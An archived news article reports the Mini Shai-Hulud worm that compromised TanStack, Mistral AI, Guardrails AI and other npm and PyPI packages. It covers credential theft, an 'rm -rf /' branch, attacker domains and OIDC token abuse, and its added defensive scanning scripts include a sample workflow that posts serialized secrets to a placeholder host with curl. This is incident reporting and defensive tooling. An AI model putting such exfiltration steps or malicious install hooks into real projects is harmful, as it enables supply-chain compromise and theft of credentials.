
Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages

The Hacker News · Archived May 12, 2026




Ravie Lakshmanan · May 12, 2026 · Supply Chain Attack / Malware

TeamPCP, the threat actor behind the recent supply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign.

The affected npm packages have been modified to include an obfuscated JavaScript file ("router_init.js") that's designed to profile the execution environment and launch a comprehensive credential stealer capable of targeting cloud providers, cryptocurrency wallets, AI tools, messaging apps, and CI systems, including GitHub Actions, multiple reports from Aikido Security, Endor Labs, SafeDep, Socket, StepSecurity, and Snyk show.

The data is exfiltrated to the "filev2.getsession[.]org" domain. Using Session Protocol infrastructure is a deliberate attempt on the part of the attackers to evade detection, as the domain is unlikely to be blocked within enterprise environments, given that it belongs to a decentralized, privacy-focused messaging service. As a fallback option, the encrypted data is committed to attacker-controlled repositories under the author name "claude@users.noreply.github.com" via the GitHub GraphQL API using the stolen GitHub tokens.

The malware is also capable of establishing persistence hooks in Claude Code and Microsoft Visual Studio Code (VS Code) to survive reboots and re-execute the stealer on every launch of the IDEs. Furthermore, it installs a gh-token-monitor service to monitor and re-exfiltrate GitHub tokens, and injects two malicious GitHub Actions workflows to serialize repository secrets into a JSON object and upload the data to an external server ("api.masscan[.]cloud").
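The injected workflows described above (serialize the secrets context, upload it to an external host) and the pull_request_target trigger the TanStack write-up names are both patterns a repository owner can screen for in workflow files. The following is an added example, not code from the article, TanStack, or any vendor cited; it is a line-based triage of GitHub Actions workflow text with three heuristic rules, run over constructed sample workflows (the collector host and file names are placeholders). A hit is a prompt to review the workflow, not proof of compromise.

```javascript
// Added example (not from the article, TanStack, or any vendor it cites):
// heuristic triage of GitHub Actions workflow text. No YAML parser, so the
// rules are intentionally simple and may over-match; treat hits as review items.

const GITHUB_HOSTS = /(^|\.)github\.com$|(^|\.)githubusercontent\.com$/;

// Each rule returns true when the workflow text shows the pattern.
const RULES = [
  {
    id: 'secrets-serialized',
    why: 'whole secrets context rendered with toJSON(secrets)',
    test: (text) => /toJSON\(\s*secrets\s*\)/i.test(text),
  },
  {
    id: 'upload-to-external-host',
    why: 'URL pointing at a host outside github.com',
    test: (text) => {
      const urls = text.match(/https?:\/\/[^\s"'`)]+/g) || [];
      return urls.some((u) => {
        try {
          return !GITHUB_HOSTS.test(new URL(u).hostname);
        } catch {
          return false; // not a parseable URL, ignore it
        }
      });
    },
  },
  {
    id: 'pull_request_target-head-checkout',
    why: 'pull_request_target trigger combined with checkout of the PR head',
    test: (text) =>
      /\bpull_request_target\b/.test(text) &&
      /github\.event\.pull_request\.head\.(sha|ref)/.test(text),
  },
];

// Returns the ids of all rules that fire for one workflow file.
function scanWorkflow(text) {
  return RULES.filter((r) => r.test(text)).map((r) => r.id);
}

// Serialization plus an external upload is the combination the article
// describes for the injected workflows, so it gets the top priority.
function severity(findings) {
  const f = new Set(findings);
  if (f.has('secrets-serialized') && f.has('upload-to-external-host')) return 'critical';
  if (f.has('secrets-serialized') || f.has('pull_request_target-head-checkout')) return 'high';
  if (f.has('upload-to-external-host')) return 'medium';
  return 'none';
}

// Constructed sample workflows (not real files from any repository).
const SAMPLES = {
  release: `
name: release
on:
  push:
    tags: ['v*']
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm publish --provenance
`,
  injected: `
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo '\${{ toJSON(secrets) }}' > /tmp/s.json
          curl -s -X POST --data @/tmp/s.json https://collector.example.invalid/upload
`,
  prTarget: `
name: pr
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: \${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
`,
};

// Scans every sample and returns { name: { findings, severity } }.
function triage(samples = SAMPLES) {
  const report = {};
  for (const [name, text] of Object.entries(samples)) {
    const findings = scanWorkflow(text);
    report[name] = { findings, severity: severity(findings) };
  }
  return report;
}

console.log(JSON.stringify(triage(), null, 2));
```

Point the same `scanWorkflow` at every file under `.github/workflows/` in a repository (read with `fs.readFileSync`) to get a baseline; a new file appearing there with a `critical` rating is the shape of the injection the article describes.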
Unlike the previous SAP wave, where the compromised packages added a preinstall hook to trigger the infection sequence, the latest TanStack cluster adopts a different strategy by including a JavaScript file within the package tarball and adding an optional dependency that points to a GitHub-hosted package. The GitHub dependency contains a prepare lifecycle hook that executes the JavaScript payload via the Bun runtime.

The updates to the Mistral AI packages, on the other hand, follow the earlier approach, replacing the contents of the "package.json" file with a preinstall hook to invoke "node setup.mjs," which downloads Bun and runs the same JavaScript malware.

TanStack has since traced the compromise to a chained GitHub Actions attack involving the "pull_request_target" trigger, GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. "No npm tokens were stolen, and the npm publish workflow itself was not compromised," TanStack said.

Specifically, the attackers are assessed to have staged the malicious payload in a GitHub fork via an orphaned commit, injected it into published npm tarballs, then hijacked the project's legitimate "TanStack/router" workflow to publish the compromised versions with valid SLSA provenance.

The attack is noteworthy for the fact that it abuses trusted publishing, allowing attacker-controlled code running within a workflow to leverage its OIDC permissions to "mint" a short-lived publish token during the build and use it to publish the packages without having to steal an npm token.

What makes the worm stand out is its ability to spread itself to other packages by locating a publishable npm token with bypass_2fa set to true, enumerating every package published by the same maintainer, and exchanging a GitHub OIDC token for a per-package publish token to sidestep traditional authentication entirely.
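Both delivery mechanisms above are visible in a package manifest before anything is installed: a lifecycle hook (preinstall, or prepare in the GitHub-hosted dependency) that runs a script shipped with the package, and an optional dependency whose spec resolves from GitHub rather than the npm registry. The following is an added example, not code from the article or from any project it names; it reviews parsed package.json objects with three heuristics and runs over constructed manifests whose names are placeholders, one shaped like each case the article describes.

```javascript
// Added example (not from the article or any project it names): pre-install
// review of npm package manifests for lifecycle hooks that execute a shipped
// script and for dependencies that do not resolve through the registry.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const DEP_FIELDS = ['dependencies', 'optionalDependencies', 'devDependencies'];

// True when a dependency spec bypasses the registry: git+ / git: / github: /
// http(s) tarballs, file: paths, or the bare owner/repo GitHub shorthand
// (a value with one slash that is not a version range or an npm: alias).
function isNonRegistrySpec(spec) {
  if (typeof spec !== 'string') return false;
  if (/^(git\+|git:|github:|https?:|file:)/.test(spec)) return true;
  return /^[\w.-]+\/[\w.-]+(#.*)?$/.test(spec);
}

// True when a hook command hands a script file to a runtime, the shape of
// "node setup.mjs" and of the Bun-executed payload the article describes.
function runsLocalScript(cmd) {
  return /\b(node|bun|bunx|npx|deno|python3?)\s+\S+\.(c?m?js|ts|py)\b/.test(cmd);
}

// Returns { rule, detail } findings for one parsed package.json object.
function reviewManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    findings.push({ rule: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
    if (runsLocalScript(scripts[hook])) {
      findings.push({ rule: 'hook-runs-local-script', detail: scripts[hook] });
    }
  }
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      if (isNonRegistrySpec(spec)) {
        findings.push({ rule: 'non-registry-dependency', detail: `${field}.${name} = ${spec}` });
      }
    }
  }
  return findings;
}

// Convenience view: just the rule ids, in the order they fired.
const ruleIds = (manifest) => reviewManifest(manifest).map((f) => f.rule);

// Constructed manifests (not real packages); all names are placeholders.
const SAMPLES = {
  clean: {
    name: '@example/widget', version: '1.4.0',
    scripts: { build: 'tsc -p .', test: 'vitest run' },
    dependencies: { '@example/core': '^1.4.0', tslib: '2.x' },
  },
  // Shape of the Mistral AI case: a preinstall hook invoking a shipped script.
  preinstallHook: {
    name: 'example-sdk', version: '2.4.7',
    scripts: { preinstall: 'node setup.mjs' },
  },
  // Shape of the TanStack case: an optional dependency resolved from GitHub.
  optionalGitDep: {
    name: '@example/router', version: '1.9.0',
    scripts: { build: 'vite build' },
    dependencies: { '@example/core': '^1.9.0' },
    optionalDependencies: { 'example-router-helper': 'github:example-org/router-helper#v1' },
  },
  // The GitHub-hosted dependency itself: npm runs `prepare` for git sources.
  gitHostedDep: {
    name: 'example-router-helper', version: '1.0.0',
    scripts: { prepare: 'bun ./router_init.js' },
  },
};

for (const [name, manifest] of Object.entries(SAMPLES)) {
  console.log(name, reviewManifest(manifest));
}
```

For a real package, feed `reviewManifest` the output of `npm view <pkg>@<version> --json` (or the package.json extracted from `npm pack`), and treat a non-registry optional dependency as a reason to fetch and review that dependency's manifest too, since its hooks run on install even though the parent has none.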
"The orphaned commit additionally triggered a GitHub Actions workflow run against the legitimate TanStack/router workflow surface," Endor Labs researcher Peyton Kennedy said. "Because the repository's OIDC trusted publisher configuration granted trust at the repository level rather than scoped to a specific protected branch and workflow file, the workflow run triggered by that commit was able to request a valid short-lived npm publish token."

The TanStack supply chain compromise has been assigned the CVE identifier CVE-2026-45321. It carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity. The incident has impacted 42 packages and 84 versions across the TanStack ecosystem.

"The attack published malicious versions through the project's own GitHub Actions release pipeline using hijacked OIDC tokens," StepSecurity researcher Ashish Kurmi said. "In an extremely rare escalation, the compromised packages carry valid SLSA Build Level 3 provenance attestations, making this the first documented npm worm that produces validly attested malicious packages. The worm has since spread beyond TanStack to packages from UiPath, DraftLab, and other maintainers."

Besides TanStack, the Mini Shai-Hulud campaign has also spread to several other packages, including some in PyPI:

- guardrails-ai@0.10.1 (PyPI)
- mistralai@2.4.6 (PyPI)
- @opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, and 3.8.0
- @squawk/mcp@0.9.5
- @squawk/weather@0.5.10
- @squawk/flightplan@0.5.6
- @tallyui/connector-medusa@1.0.1, 1.0.2, and 1.0.3
- @tallyui/connector-vendure@1.0.1, 1.0.2, and 1.0.3

Microsoft, in its analysis of the malicious mistralai PyPI package, said it's designed to download a credential stealer from a remote server ("83.142.209[.]194") that includes country-aware logic to avoid Russian-language environments and a "geofenced destructive branch that has a 1-in-6 chance of executing rm -rf / when the system appears to be in Israel or Iran."
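The Endor Labs quote above pins the root cause on the scope of the trusted-publisher configuration: trust granted to the repository as a whole, rather than to one workflow file on one protected branch. The following is an added example, not TanStack's configuration and not npm's own token-exchange logic; it evaluates constructed GitHub OIDC claim sets against a repository-level policy and a branch-and-workflow-scoped policy so the difference is concrete. The claim names used (repository, ref, workflow_ref, event_name) are ones GitHub's OIDC tokens carry; the repository name and ref values are placeholders.

```javascript
// Added example (not TanStack's configuration, not npm's logic): evaluate
// GitHub OIDC token claims against two trusted-publisher policies. The claim
// values below are constructed; the claim names are real GitHub OIDC claims.

// A policy states which claims are acceptable for publishing. Only
// `repository` is mandatory; each extra field tightens the match.
function matchesPolicy(claims, policy) {
  const reasons = [];
  if (claims.repository !== policy.repository) reasons.push('repository mismatch');
  if (policy.ref && claims.ref !== policy.ref) {
    reasons.push(`ref ${claims.ref} is not ${policy.ref}`);
  }
  if (policy.workflowPath) {
    // workflow_ref has the form "<owner>/<repo>/<path to workflow file>@<ref>"
    const expected = `${policy.repository}/${policy.workflowPath}@${policy.ref}`;
    if (claims.workflow_ref !== expected) {
      reasons.push(`workflow_ref ${claims.workflow_ref} is not ${expected}`);
    }
  }
  if (policy.events && !policy.events.includes(claims.event_name)) {
    reasons.push(`event ${claims.event_name} not allowed`);
  }
  return { allowed: reasons.length === 0, reasons };
}

const REPO = 'example-org/router'; // placeholder, not the real project

// Repository-level trust: any workflow run in the repository qualifies.
const REPO_LEVEL_POLICY = { repository: REPO };

// Scoped trust: only the release workflow file, on the protected default
// branch, triggered by a push.
const SCOPED_POLICY = {
  repository: REPO,
  ref: 'refs/heads/main',
  workflowPath: '.github/workflows/release.yml',
  events: ['push'],
};

// Constructed claim sets shaped like the payload of a GitHub OIDC token.
const CLAIMS = {
  legitimateRelease: {
    repository: REPO, ref: 'refs/heads/main', event_name: 'push',
    workflow_ref: `${REPO}/.github/workflows/release.yml@refs/heads/main`,
  },
  // The legitimate workflow file run against a non-protected ref in the same
  // repository: the situation the Endor Labs quote describes.
  rogueRunSameRepo: {
    repository: REPO, ref: 'refs/heads/tmp-orphan', event_name: 'push',
    workflow_ref: `${REPO}/.github/workflows/release.yml@refs/heads/tmp-orphan`,
  },
  // A run in a fork matches neither policy.
  forkRun: {
    repository: 'someone-else/router', ref: 'refs/heads/main', event_name: 'push',
    workflow_ref: 'someone-else/router/.github/workflows/release.yml@refs/heads/main',
  },
};

// Per claim set, whether each policy would let it mint a publish token.
function evaluateAll(claimSets = CLAIMS) {
  const out = {};
  for (const [name, claims] of Object.entries(claimSets)) {
    out[name] = {
      repoLevel: matchesPolicy(claims, REPO_LEVEL_POLICY).allowed,
      scoped: matchesPolicy(claims, SCOPED_POLICY).allowed,
    };
  }
  return out;
}

console.log(evaluateAll());
```

The rogue run passes the repository-level policy and fails the scoped one on two counts (ref and workflow_ref), which is the whole argument for configuring a trusted publisher with the workflow file name and a protected branch rather than the repository alone.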
"The guardrails-ai@0.10.1 compromise is especially notable because the malicious code executes on import," Socket said. "The package checks for Linux systems, downloads a remote Python artifact from https://git-tanstack.com/transformers.pyz, writes it to /tmp/transformers.pyz, and executes it with python3 without integrity verification."

"This latest activity shows the campaign continuing to propagate across both npm and PyPI, with affected packages spanning search infrastructure, AI tooling, aviation-related developer packages, enterprise automation, frontend tooling, and CI/CD-adjacent ecosystems."
Article Info
Source: The Hacker News
Category: Industry News & Leadership
Published: May 12, 2026
Archived: May 12, 2026